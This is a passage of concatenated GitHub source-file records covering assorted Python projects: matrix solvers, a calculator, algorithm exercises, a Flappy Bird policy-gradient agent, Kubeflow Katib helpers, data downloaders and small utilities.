MatrixMethods:\n\n @classmethod\n def _shape_checker(cls,A: np.ndarray, b: np.ndarray) -> None:\n try:\n if A.shape[0] != A.shape[1]:\n raise ValueError(\"A must be a square matrix\")\n except IndexError:\n raise ValueError(\"A must be a 2D matrix\")\n try:\n _ = b.shape[1]\n raise ValueError(\"b must be a column vector\")\n except IndexError:\n pass\n return\n \n \n def lu(self) -> tuple[np.ndarray, np.ndarray]:\n '''Gotten from https://johnfoster.pge.utexas.edu/numerical-methods-book/LinearAlgebra_LU.html'''\n #Get the number of rows\n n = self.A.shape[0]\n\n U = np.zeros((n, n), dtype=np.double)\n L = np.eye(n, dtype=np.double)\n\n #Loop over rows\n for k in range(n):\n U[k, k:] = self.A[k, k:] - L[k,:k] @ U[:k,k:]\n L[(k+1):,k] = (self.A[(k+1):,k] - L[(k+1):,:] @ U[:,k]) / U[k, k]\n \n return L, U\n \n \n def __init__(self,A: np.ndarray, b: np.ndarray):\n self._shape_checker(A, b)\n self.A = A\n self.b = b\n self.L = np.tril(A) # lower triangular part (diagonal included)\n self.U = np.triu(A, 1) # strictly upper triangular part\n \n \n def __str__(self):\n return self.__class__.__name__\n \n \n def LU_decompose(self) -> np.ndarray:\n L, U = self.lu()\n l_inv = np.linalg.inv(L)\n u_inv = np.linalg.inv(U)\n #Solve Ly = b.\n y = np.dot(l_inv, self.b)\n #Solve Ux = y.\n x = np.dot(u_inv, y)\n return x\n\n \n def cholesky_decomposition(self) -> np.ndarray:\n ''' Solving A = GG^T'''\n G = np.linalg.cholesky(self.A)\n g_inv = np.linalg.inv(G)\n g_trans = np.transpose(G)\n g_trans_inv = np.linalg.inv(g_trans)\n #Solve Gy = b.\n y = np.dot(g_inv, self.b)\n #Solve G^Tx = y.\n x = np.dot(g_trans_inv, y)\n return x\n \n \n def gauss_seidel(self, initial_guess: np.ndarray, n: int) -> np.ndarray:\n x = [initial_guess]\n l_inv = np.linalg.inv(self.L)\n for i in range(n):\n solution = np.dot(l_inv,(self.b - np.dot(self.U ,x[i])))\n x.append(solution)\n return x[-1]\n \n \n def true_solution(self) -> np.ndarray:\n return np.dot(np.linalg.inv(self.A), self.b)\n \n \n @staticmethod\n def eigen_estimates(A: np.ndarray) -> list[tuple]:\n MatrixMethods._shape_checker(A, b= np.array([0]))\n # Gershgorin circle theorem: each eigenvalue lies within row_sum of a diagonal entry.\n out = []\n n = A.shape[0]\n for i in range(n):\n row_sum = 0\n for j in range(n):\n if i==j:\n lhs = A[i][i]\n else:\n row_sum += abs(A[i][j])\n upper_bound = row_sum + lhs\n lower_bound = lhs - row_sum\n out.append((lower_bound, upper_bound))\n return out","repo_name":"Chinedu-E/Mathematical-Modelling","sub_path":"Code/matrix_computations.py","file_name":"matrix_computations.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9076224978","text":"on = 'Y'\n\nwhile on == 'Y':\n operating_1 = float(input('Enter an operand: '))\n operating_2 = float(input('Enter another operand: '))\n operator = input('Enter the operator: ')\n\n if operator == '+':\n print(f'The result of the addition is: {operating_1 + operating_2:.2f}')\n elif operator == '-':\n print(f'The result of the subtraction is: {operating_1 - operating_2:.2f}')\n elif operator == '*':\n print(\n f'The result of the multiplication is: {operating_1 * operating_2:.2f}')\n elif operator == '/':\n if operating_2 == 0.0:\n print('Division by zero is not possible!')\n else:\n print(f'The result of the division is: {operating_1 / operating_2:.2f}')\n\n on = input('Do you want to perform more operations? 
(Y/N): ')\n","repo_name":"ErnestoTSantos/CursoPythonCodar.me","sub_path":"ControleFluxo/Exercicios_Controle_Fluxo/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8654562095","text":"#!/usr/bin/python3\n\n\"\"\"\nGather data from an API\n\"\"\"\n\nimport requests\nfrom sys import argv\n\n\nAPI_URL = \"https://jsonplaceholder.typicode.com\"\n\nif __name__ == \"__main__\":\n userInfo = requests.get(\"{}/users/{}\".format(API_URL, argv[1])).json()\n taskToDo = requests.get(\"{}/todos?userId={}\".\n format(API_URL, argv[1])).json()\n completedTask = []\n for task in taskToDo:\n if task[\"completed\"]:\n completedTask.append(task['title'])\n\n print(\"Employee {} is done with tasks({}/{}):\".\n format(userInfo['name'], len(completedTask), len(taskToDo)))\n\n print(\"\\n\".join(\"\\t {}\".format(task) for task in completedTask))\n","repo_name":"Camaltra/holberton-system_engineering-devops","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69947815469","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 5 16:55:48 2021\n\n@author: hihyun\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 5 15:37:37 2021\n\n@author: hihyun\n\"\"\"\n# prefix first\nfrom collections import defaultdict\nclass Node:\n def __init__(self):\n self.length=defaultdict(int)\n self.children={}\nclass Trie:\n def __init__(self):\n self.head=Node()\n def insert(self,string):\n cur_node=self.head\n length=len(string)\n cur_node.length[length]+=1\n for i in string:\n if i not in cur_node.children:\n cur_node.children[i]=Node()\n cur_node.children[i].length[length]+=1\n cur_node=cur_node.children[i]\n \n def search(self,string,length):\n l=length\n cur_node=self.head\n count=0\n for i in string:\n if i not in cur_node.children:\n return 0\n cur_node=cur_node.children[i]\n if l in cur_node.length:\n count=cur_node.length[length]\n return count\ndef solution(user_id, banned_id):\n post=Trie()\n pre=Trie()\n \n for i in user_id:\n post.insert(i[::-1])\n pre.insert(i)\n\n answer=[]\n for i in banned_id:\n if i[0]=='?':\n\n answer.append(post.search(i[::-1].replace('?',''),len(i)))\n else:\n answer.append(pre.search(i.replace('?',''),len(i)))\n\n return answer\n \n \nq=[\"fro??\", \"????o\", \"fr???\", \"fro???\", \"pro??\",'?????','????do','f????']\nu=[\"frodo\", \"front\", \"frost\", \"frozen\", \"frame\", \"kakao\"]\nprint(solution(u,q))","repo_name":"hyeinhyun/alg_prac","sub_path":"kakao기출/[kakao2020 intern]4_5.py","file_name":"[kakao2020 intern]4_5.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26283778308","text":"class Solution(object):\n def minDifference(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums = sorted(nums)\n if len(nums) <=3:\n return 0\n sol1 = nums[-4] - nums[0]\n sol2 = nums[-3] - nums[1]\n sol3 = nums[-2] - nums[2]\n sol4 = nums[-1] - nums[3]\n return min(sol1, sol2, sol3, 
sol4)\n","repo_name":"humanalgorithm/leetcode_solutions","sub_path":"minimum-difference-between-largest-and-smallest-value-in-three-moves/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"975115222","text":"# -*- coding:utf-8 -*-\n#\n# Author : 寒江雪\n# E-mail :\n# Date : 19/11/09 00:03:44\n# Desc : Play Flappy Bird with policy gradients\n#\n\"\"\"\nDependencies:\ntensorflow r1.14\npygame 1.9.4\n\"\"\"\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport cv2\nimport sys\nsys.path.append(\"game/\")\nimport wrapped_flappy_bird as game\nimport random\nimport numpy as np\nfrom collections import deque\nimport os\n\nclass Config(object):\n GAME = 'bird'\n ACTIONS = 2\n GAMMA = 0.99\n OBSERVE = 100000.0\n EXPLORE = 2000000.0\n FINAL_EPSILON = 0.0001\n INITIAL_EPSILON = 0.06\n REPLAY_MEMORY = 50000\n BATCH = 32\n FRAME_PER_ACTION = 1\n SAVE_MODEL_EVERY = 10000\n\n\nclass PolicyGradient(object):\n def __init__(self, scope='estimator', log_dir=None, config=Config):\n self.scope = scope\n self.summary_writer = None\n self.config = config\n # Observations, actions and rewards collected along one trajectory\n self.ep_obs, self.ep_as, self.ep_rs = [], [], []\n with tf.variable_scope(scope):\n self.build_graph()\n if log_dir:\n summary_dir = os.path.join(log_dir, scope)\n if os.path.exists(summary_dir):\n print(summary_dir + \" already exists.\")\n else:\n os.makedirs(summary_dir)\n self.summary_writer = tf.summary.FileWriter(summary_dir)\n\n def weight_variable(self, shape):\n initial = tf.truncated_normal(shape, stddev = 0.01)\n return tf.Variable(initial)\n\n def bias_variable(self, shape):\n initial = tf.constant(0.01, shape = shape)\n return tf.Variable(initial)\n\n def conv2d(self, x, W, stride):\n return tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"SAME\")\n\n def max_pool_2x2(self, x):\n return tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\n\n def build_graph(self):\n # network weights\n W_conv1 = self.weight_variable([8, 8, 4, 32])\n b_conv1 = self.bias_variable([32])\n\n W_conv2 = self.weight_variable([4, 4, 32, 64])\n b_conv2 = self.bias_variable([64])\n\n W_conv3 = self.weight_variable([3, 3, 64, 64])\n b_conv3 = self.bias_variable([64])\n\n W_fc1 = self.weight_variable([1600, 512])\n b_fc1 = self.bias_variable([512])\n\n W_fc2 = self.weight_variable([512, self.config.ACTIONS])\n b_fc2 = self.bias_variable([self.config.ACTIONS])\n\n self.s = tf.placeholder(\"float\", [None, 80, 80, 4])\n self.tf_acts = tf.placeholder(tf.int32, [None, ], name=\"actions_num\")\n self.tf_vt = tf.placeholder(tf.float32, [None, ], name=\"actions_value\")\n\n\n\n h_conv1 = tf.nn.relu(self.conv2d(self.s, W_conv1, 4) + b_conv1)\n h_pool1 = self.max_pool_2x2(h_conv1)\n\n h_conv2 = tf.nn.relu(self.conv2d(h_pool1, W_conv2, 2) + b_conv2)\n #h_pool2 = max_pool_2x2(h_conv2)\n\n h_conv3 = tf.nn.relu(self.conv2d(h_conv2, W_conv3, 1) + b_conv3)\n #h_pool3 = max_pool_2x2(h_conv3)\n\n #h_pool3_flat = tf.reshape(h_pool3, [-1, 256])\n h_conv3_flat = tf.reshape(h_conv3, [-1, 1600])\n\n h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1)\n\n # Raw action scores (logits)\n self.readout = tf.matmul(h_fc1, W_fc2) + b_fc2\n\n # Softmax turns the scores into per-action probabilities\n self.all_act_prob = tf.nn.softmax(self.readout, name='act_prob')\n # Define the loss function\n with tf.name_scope('loss'):\n neg_log_prob = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.readout,labels=self.tf_acts)\n self.loss = 
tf.reduce_mean(neg_log_prob*self.tf_vt)\n # Define the training op that updates the parameters\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(1e-6).minimize(self.loss)\n #self.summaries = tf.summary.merge([\n # tf.summary.scalar('loss_total', self.loss),\n # tf.summary.scalar('max_action', tf.reduce_max(self.readout))\n #])\n\n def predict(self, sess, s_t):\n all_act_prob = sess.run(self.all_act_prob, feed_dict={self.s: s_t})\n # Sample an action according to the predicted probabilities\n action = np.random.choice(range(all_act_prob.shape[1]), p=all_act_prob.ravel())\n return action\n\n def greedy(self, sess, observation):\n prob_weights = sess.run(self.all_act_prob, feed_dict={self.s: observation[np.newaxis, :]})\n action = np.argmax(prob_weights.ravel())\n return action\n\n # Store the states, actions and rewards of one episode together\n def store_transition(self, s, a, r):\n self.ep_obs.append(s)\n self.ep_as.append(a)\n self.ep_rs.append(r)\n\n # Update the policy network parameters; called once after each episode\n def train(self, sess):\n # Compute the discounted returns of the episode\n discounted_ep_rs_norm = self._discount_and_norm_rewards()\n # Run the training op to update the parameters\n sess.run(self.train_op, feed_dict={\n self.s: self.ep_obs,\n self.tf_acts: self.ep_as,\n self.tf_vt: discounted_ep_rs_norm\n })\n # Clear the episode buffers\n self.ep_obs, self.ep_as, self.ep_rs = [], [],[]\n return discounted_ep_rs_norm\n\n def _discount_and_norm_rewards(self):\n # Discounted cumulative rewards\n discounted_ep_rs =np.zeros_like(self.ep_rs)\n running_add = 0\n for t in reversed(range(0, len(self.ep_rs))):\n running_add = running_add * self.config.GAMMA + self.ep_rs[t]\n discounted_ep_rs[t] = running_add\n # Normalize\n discounted_ep_rs-= np.mean(discounted_ep_rs)\n discounted_ep_rs /= np.std(discounted_ep_rs)\n return discounted_ep_rs\n\n\ndef preprocess_state(x_t):\n x_t = cv2.cvtColor(cv2.resize(x_t, (80, 80)), cv2.COLOR_BGR2GRAY)\n ret, x_t = cv2.threshold(x_t, 1, 255, cv2.THRESH_BINARY)\n return x_t\n\n\ndef train_policy_network(sess, policy_gradient_net, model_dir=None):\n # Start the game\n game_state = game.GameState()\n\n do_nothing = np.zeros(Config.ACTIONS)\n do_nothing[0] = 1\n x_t, r_0, terminal = game_state.frame_step(do_nothing)\n x_t = preprocess_state(x_t)\n s_t = np.stack((x_t, x_t, x_t, x_t), axis=2)\n\n # saving and loading networks\n saver = tf.train.Saver()\n sess.run(tf.initialize_all_variables())\n checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\n if False and checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n else:\n print(\"Could not find old network weights\")\n\n # start training\n epsilon = Config.INITIAL_EPSILON\n t = 0\n i_episode = 0\n while \"flappy bird\" != \"angry bird\":\n readout_t = policy_gradient_net.predict(sess, [s_t])\n # Action encoding: [1,0] does nothing; [0,1] flaps the bird upward\n a_t = np.zeros([Config.ACTIONS])\n a_t[readout_t] = 1\n print(readout_t, a_t)\n # run the selected action and observe next state and reward\n # frame_step returns the screen image, the reward and whether the game ended\n x_t1_colored, r_t, terminal = game_state.frame_step(a_t)\n x_t1 = preprocess_state(x_t1_colored)\n x_t1 = np.reshape(x_t1, (80, 80, 1))\n s_t1 = np.append(x_t1, s_t[:, :, :3], axis=2)\n\n # Store the observation, action and reward\n policy_gradient_net.store_transition(s_t, readout_t, r_t)\n s_t = s_t1\n # Train once whenever an episode finishes\n if terminal:\n ep_rs_sum = sum(policy_gradient_net.ep_rs)\n print(\"episode:\", i_episode, \"rewards:\", ep_rs_sum)\n # Learn once per episode\n vt = policy_gradient_net.train(sess)\n i_episode += 1\n\ndef main():\n log_dir = \"log_dir/\"\n policy_gradient_net = PolicyGradient(scope='estimator', log_dir=log_dir)\n with tf.Session() as sess:\n        
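# Initialize all graph variables before training (TF1-style explicit init).\n        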
sess.run(tf.global_variables_initializer())\n train_policy_network(sess, policy_gradient_net, None)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wwbin2017/reinforcement-learning","sub_path":"src/third/policy_network.py","file_name":"policy_network.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41301373276","text":"import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom config import *\nfrom utils import *\n\n\nclass ProjectSumModel():\n\n FIELD_IDENTITY_ID = \"identity_id\"\n FIELD_PROJECT_ID = \"project_id\"\n FIELD_TYPE = \"type\"\n\n def __init__(self, table_name) -> None:\n self.table = boto3.resource('dynamodb').Table(table_name)\n\n def reset_prj_sum_preprocess(self, project_id, type_data):\n response = self.table.update_item(\n Key={\n self.FIELD_PROJECT_ID: project_id,\n self.FIELD_TYPE: type_data,\n },\n ExpressionAttributeNames={\n '#CO': 'count',\n '#TS': 'total_size'\n },\n ExpressionAttributeValues={\n ':ts': 0,\n ':co': 0\n },\n UpdateExpression='SET #TS = :ts, #CO = :co'\n )\n return response\n\n def get_item(self, project_id, type_data):\n response = self.table.get_item(\n Key={\n 'project_id': project_id,\n 'type': type_data,\n }\n )\n print(response)\n if 'Item' in response:\n return response['Item']\n elif 'ResponseMetadata' in response and response['ResponseMetadata']['HTTPStatusCode'] == 200:\n return {'count': 0}\n return None\n","repo_name":"daita-technologies/backend","sub_path":"daita-app/shared-layer/commons/python/models/project_sum_model.py","file_name":"project_sum_model.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"18464801040","text":"from urllib import request\nfrom zipfile import ZipFile\nfrom io import BytesIO\nimport csv\nfrom operator import itemgetter\nimport itertools as it\nimport json\nimport os\n\n\ndef function_points_quality(grupo):\n points = []\n quality = []\n for row in grupo:\n points.append([row['TIME_PERIOD'] + ' , ' + row['OBS_VALUE']])\n quality.append([row['TIME_PERIOD'] + ' , ' + row['ASSESSMENT_CODE']])\n\n return points, quality\n\n\nresponse = request.urlopen(\n \"https://www.jodidata.org/_resources/files/downloads/gas-data/jodi_gas_csv_beta.zip\")\nif os.path.exists(\"downloads\") != True:\n os.mkdir(\"downloads\")\n\nunzip = ZipFile(BytesIO(response.read()))\nunzip.extractall(\"downloads\")\nunzip.close()\n\nwith open(\"downloads/jodi_gas_beta.csv\", 'r') as myfile:\n\n reader = csv.DictReader(myfile)\n\n primary_key = itemgetter('REF_AREA', 'ENERGY_PRODUCT', 'FLOW_BREAKDOWN', 'UNIT_MEASURE',\n 'TIME_PERIOD')\n reader = sorted(reader, key=primary_key)\n\n\nkeys, groups = [], []\nkeyfunc = itemgetter('REF_AREA', 'ENERGY_PRODUCT',\n 'FLOW_BREAKDOWN', 'UNIT_MEASURE')\nfor k, g in it.groupby(reader, key=keyfunc):\n keys.append(k[0]+k[1]+k[2]+k[3])\n groups.append(list(g))\n\n\nfor i, group in enumerate(groups):\n\n points, quality = function_points_quality(group)\n resultado = {\n 'series_id': ''.join(keys[i]),\n 'points': points,\n 'series': {\n 'country': ''.join(group[0]['REF_AREA']),\n 'product': ''.join(group[0]['ENERGY_PRODUCT']),\n 'flow': ''.join(group[0]['FLOW_BREAKDOWN']),\n 'unit_meassure': ''.join(group[0]['UNIT_MEASURE']),\n 'quality': quality\n }\n }\n\n result = json.dumps(resultado)\n\n 
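# Emit one JSON document per (area, product, flow, unit) group.\n    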
print(result)\n","repo_name":"kenedycpd/Task_Shooju","sub_path":"bot_shooju.py","file_name":"bot_shooju.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73669081708","text":"import json\nimport os\nimport textwrap\nfrom typing import Callable\nimport inspect\n\nfrom kubeflow.katib import models\nfrom kubeflow.katib.constants import constants\n\n\ndef is_running_in_k8s():\n return os.path.isdir(\"/var/run/secrets/kubernetes.io/\")\n\n\ndef get_current_k8s_namespace():\n with open(\"/var/run/secrets/kubernetes.io/serviceaccount/namespace\", \"r\") as f:\n return f.readline()\n\n\ndef get_default_target_namespace():\n if not is_running_in_k8s():\n return \"default\"\n return get_current_k8s_namespace()\n\n\ndef set_katib_namespace(katib):\n katib_namespace = katib.metadata.namespace\n namespace = katib_namespace or get_default_target_namespace()\n return namespace\n\n\ndef has_condition(conditions, condition_type):\n \"\"\"Verify if the condition list has the required condition.\n Condition should be valid object with `type` and `status`.\n \"\"\"\n\n for c in conditions:\n if c.type == condition_type and c.status == constants.CONDITION_STATUS_TRUE:\n return True\n return False\n\n\ndef print_experiment_status(experiment: models.V1beta1Experiment):\n if experiment.status:\n print(\n \"Experiment Trials status: {} Trials, {} Pending Trials, \"\n \"{} Running Trials, {} Succeeded Trials, {} Failed Trials, \"\n \"{} EarlyStopped Trials, {} MetricsUnavailable Trials\".format(\n experiment.status.trials or 0,\n experiment.status.trials_pending or 0,\n experiment.status.trials_running or 0,\n experiment.status.trials_succeeded or 0,\n experiment.status.trials_failed or 0,\n experiment.status.trials_early_stopped or 0,\n experiment.status.trial_metrics_unavailable or 0,\n )\n )\n print(f\"Current Optimal Trial:\\n {experiment.status.current_optimal_trial}\")\n print(f\"Experiment conditions:\\n {experiment.status.conditions}\")\n\n\ndef validate_objective_function(objective: Callable):\n\n # Check if objective function is callable.\n if not callable(objective):\n raise ValueError(\n f\"Objective function must be callable, got function type: {type(objective)}\"\n )\n\n # Verify the objective function arguments.\n objective_signature = inspect.signature(objective)\n try:\n objective_signature.bind({})\n except Exception:\n raise ValueError(\n \"Invalid args in the Objective function. \"\n \"The function args must have only 'parameters' dictionary. \"\n f\"Current Objective arguments: {objective_signature}\"\n )\n\n\ndef get_script_for_python_packages(packages_to_install, pip_index_url):\n packages_str = \" \".join([str(package) for package in packages_to_install])\n\n script_for_python_packages = textwrap.dedent(\n f\"\"\"\n if ! 
[ -x \"$(command -v pip)\" ]; then\n python3 -m ensurepip || python3 -m ensurepip --user || apt-get install python3-pip\n fi\n\n PIP_DISABLE_PIP_VERSION_CHECK=1 python3 -m pip install --prefer-binary --quiet \\\n --no-warn-script-location --index-url {pip_index_url} {packages_str}\n \"\"\"\n )\n\n return script_for_python_packages\n\n\nclass FakeResponse:\n \"\"\"Fake object of RESTResponse to deserialize\n Ref) https://github.com/kubeflow/katib/pull/1630#discussion_r697877815\n Ref) https://github.com/kubernetes-client/python/issues/977#issuecomment-592030030\n \"\"\"\n\n def __init__(self, obj):\n self.data = json.dumps(obj)\n","repo_name":"kubeflow/katib","sub_path":"sdk/python/v1beta1/kubeflow/katib/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"37"} +{"seq_id":"22224603342","text":"#!/usr/bin/env python3\n\n\"\"\"\nThe code in this file is based on the following source, thanks to the author.\nSource: https://gist.github.com/peci1/912549b79fd6e8801023\n\"\"\"\n\nimport types\nfrom typing import List\nfrom typing import TypedDict\nfrom typing import Union\n\n\nclass EnumItem(TypedDict):\n name: str\n value: Union[bool, int, float, str]\n description: str\n\n\nclass ConfigModifier:\n @staticmethod\n def change_enum_items(config_type: types.ModuleType,\n parameter_name: str,\n new_enum_items: List[EnumItem],\n default=None) -> None:\n \"\"\"\n Change the content of a dynamic reconfigure enum field.\n In order to add the new values properly the dynamic reconfigure server has to be created after the enum has been\n updated.\n :param config_type: autogenerated config (package.cfg.*Config)\n :param parameter_name: parameter to change (has to have enum as edit method)\n :param new_enum_items: the new items that will replace the original enum\n :type new_enum_items: list of dicts with structure {\"name\": ..., \"value\": ..., \"description\": ...}\n :param default: this will be the default if provided, otherwise the first element will be the default\n :raises RuntimeError: if there is no valid enum parameter with the given name in the given config_type\n \"\"\"\n\n if not hasattr(config_type, \"config_description\") or not hasattr(config_type, \"defaults\"):\n raise RuntimeError(\"dynamic reconfigure {} \"\n \"is not a valid dynamic reconfigure type\".format(str(config_type)))\n\n for parameter_description in config_type.config_description[\"parameters\"]:\n if parameter_description[\"name\"] == parameter_name:\n if parameter_description[\"edit_method\"] == \"\":\n raise RuntimeError(\"dynamic reconfigure {} \"\n \"has other edit method than enum\".format(str(config_type)))\n\n edit_method = eval(parameter_description[\"edit_method\"])\n enum = edit_method[\"enum\"]\n\n if len(enum) == 0:\n raise RuntimeError(\"dynamic reconfigure {} \"\n \"has too few elements to be a proper enum\".format(str(config_type)))\n\n sample_enum_item = enum[0]\n\n new_enum = []\n for item in new_enum_items:\n new_enum_item = sample_enum_item.copy()\n new_enum_item[\"name\"] = item[\"name\"]\n new_enum_item[\"value\"] = item[\"value\"]\n new_enum_item[\"description\"] = item[\"description\"]\n new_enum.append(new_enum_item)\n\n edit_method[\"enum\"] = new_enum\n parameter_description[\"edit_method\"] = repr(edit_method)\n\n parameter_description[\"default\"] = default if default is not None else new_enum[0][\"value\"]\n config_type.defaults[parameter_description[\"name\"]] = default\n\n 
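# The matching enum parameter has been rewritten; nothing left to do.\n                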
return\n\n raise RuntimeError(\"dynamic reconfigure {} has no parameter {}\".format(str(config_type), parameter_name))\n","repo_name":"tuw-robotics/tuw_teleop","sub_path":"tuw_gamepad_python/src/tuw_gamepad_python/utilities/config_modifier.py","file_name":"config_modifier.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25112834916","text":"class MoveSet:\n def __init__(self, forme, golpes_possiveis):\n self.forme = forme\n self.golpes_possiveis = golpes_possiveis\n \ndef isvazio(campo):\n if campo == '':\n return True\n else:\n return False\n\ndef import_moveset(dataset_url):\n from movesets import isvazio\n file = open(dataset_url)\n movesets = {}\n for poke in file:\n linha = poke.split(',')\n if not linha[0].isnumeric():\n continue\n golpes = {}\n for golpe in linha[3:]:\n if isvazio(golpe):\n continue\n linha_golpe = golpe.split(' - ')\n golpes[linha_golpe[-1]] = linha_golpe[0]\n moveset = MoveSet(linha[2], golpes)\n movesets[linha[2]] = moveset\n return movesets\n","repo_name":"Lucas-R4mos/PokePython","sub_path":"movesets.py","file_name":"movesets.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39995641804","text":"import argparse\nimport logging\nfrom itertools import tee\n\n# finally stumbled on an nwise function that eluded me in Advent 2015.\n# extrapolated from day03.threewise\n\ndef nwise(iterable, n):\n streams = tee(iterable, n)\n\n for i, stream in enumerate(reversed(streams)):\n for _ in range(n - i):\n next(stream, None)\n\n values = zip(*streams)\n for x in values:\n yield x\n for _ in range(n - 1):\n next(values)\n\ndef show_and_tell():\n l = list(range(28))\n print(l)\n print(list(nwise(l, 3)))\n\n print(list(nwise(l, 5)))\n\ndef consume(iterable):\n return map(lambda x: x, iterable)\n\ndef stress():\n MILLION = 1000 * 1000\n BILLION = MILLION * MILLION\n TRILLION = BILLION * BILLION\n print('n-wise-ing a million number into 100\\'s pairs.')\n log = logging.getLogger('stress')\n for paired in nwise(range(MILLION), 100):\n log.debug(paired)\n\ndef main():\n \"\"\"\n Demonstrate an n-wise pairing function.\n \"\"\"\n parser = argparse.ArgumentParser(description=main.__doc__)\n parser.add_argument('--stress-test', action='store_true', help='Test doing a lot of these.')\n parser.add_argument('--debug', action='store_true', help='Show debugging')\n args = parser.parse_args()\n\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n\n if args.stress_test:\n stress()\n else:\n show_and_tell()\n\nif __name__ == '__main__':\n main()\n","repo_name":"hitbox/scratch","sub_path":"adventofcode/aoc2016/nwise.py","file_name":"nwise.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18976223842","text":"\"\"\"Changelog.\"\"\"\nimport sublime\nimport sublime_plugin\nimport webbrowser\n\nCSS = '''\nhtml { {{'.background'|css}} }\ndiv.bracket-highlighter { padding: 0; margin: 0; {{'.background'|css}} }\n.bracket-highlighter h1, .bracket-highlighter h2, .bracket-highlighter h3,\n.bracket-highlighter h4, .bracket-highlighter h5, .bracket-highlighter h6 {\n {{'.string'|css}}\n}\n.bracket-highlighter blockquote { {{'.comment'|css}} }\n.bracket-highlighter a { text-decoration: none; }\n'''\n\n\nclass BracketHighlighterChangesCommand(sublime_plugin.WindowCommand):\n 
\"\"\"Changelog command.\"\"\"\n\n def run(self):\n \"\"\"Show the changelog in a new view.\"\"\"\n try:\n import mdpopups\n has_phantom_support = (mdpopups.version() >= (1, 10, 0)) and (int(sublime.version()) >= 3118)\n except Exception:\n has_phantom_support = False\n\n text = sublime.load_resource('Packages/BracketHighlighter/CHANGES.md')\n view = self.window.new_file()\n view.set_name('BracketHighlighter - Changelog')\n view.settings().set('gutter', False)\n if has_phantom_support:\n mdpopups.add_phantom(\n view,\n 'changelog',\n sublime.Region(0),\n text,\n sublime.LAYOUT_INLINE,\n wrapper_class=\"bracket-highlighter\",\n css=CSS\n )\n else:\n view.run_command('insert', {\"characters\": text})\n view.set_read_only(True)\n view.set_scratch(True)\n\n def on_navigate(self, href):\n \"\"\"Open links.\"\"\"\n webbrowser.open_new_tab(href)\n","repo_name":"kdfight/st3","sub_path":"BracketHighlighter-master/changes.py","file_name":"changes.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22016911225","text":"import requests\nimport blaseball\nimport ast\nimport time\n\nargs = {'season':'-1'}\nkeyword = input('Enter keyword: ')\nout = blaseball.searchChronicler(args, keyword)\ngame = ''\nfor i in out:\n\td = i['data']\n\tif i['gameId'] != game:\n\t\tseason = d['season']\n\t\tday = d['day']\n\t\thome = d['homeTeamName']\n\t\taway = d['awayTeamName']\n\t\tprint('\\n{}/{} {} VS. {}'.format(season,day,home,away).upper())\n\t\tgame = i['gameId']\n\tprint(d['lastUpdate'])\n\ninput()\n","repo_name":"Updownbanana/Updown-Blaseball","sub_path":"chronicler_search.py","file_name":"chronicler_search.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31105584475","text":"import signal\nfrom datetime import datetime\nimport numpy as np\nimport TAT\nfrom ..ansatz_product_state import AnsatzProductState, Observer, SweepSampling, ErgodicSampling\nfrom ..utility import (show, showln, mpi_comm, mpi_rank, mpi_size, SignalHandler, seed_differ, write_to_file,\n get_imported_function, restrict_wrapper, send)\n\n\ndef check_difference(state, observer, grad, energy_observer, configuration_pool, check_difference_delta):\n\n def get_energy():\n state.ansatz.refresh_auxiliaries()\n with energy_observer:\n energy_observer(configuration_pool)\n energy, _ = energy_observer.total_energy\n return energy\n\n original_energy, _ = observer.total_energy\n delta = check_difference_delta\n showln(f\"difference delta is set as {delta}\")\n\n element_g = state.ansatz.elements(None) # 